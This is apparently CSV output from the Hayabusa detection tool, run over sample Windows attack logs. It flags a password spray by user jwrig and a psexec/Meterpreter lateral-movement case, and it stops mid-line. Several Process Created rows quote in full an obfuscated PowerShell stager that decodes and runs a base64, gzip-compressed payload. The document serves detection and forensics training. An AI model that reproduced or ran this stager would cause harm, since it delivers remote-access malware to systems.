+2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:03.525 +09:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:bking/edygert/drook/cragoso/ssims/jlake/jorchilles/bgreenwood/mdouglas/baker/smisenar/dmashburn/bgalbraith/cspizor IpAddress:172.16.144.128 timeframe:5m,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_PW-Spray_Count.yml,-
+2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 05:26:51.793 +09:00,IEWIN7,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,Exec,PowerShell as a Service in Registry,,../hayabusa-rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations in Registry,,../hayabusa-rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3348 | PGUID: 365ABB72-AF8B-5CC8-0000-00101C1A1900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Exec | C2,Curl Start Combination,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,info,,Process Created,"Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 3872 | PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 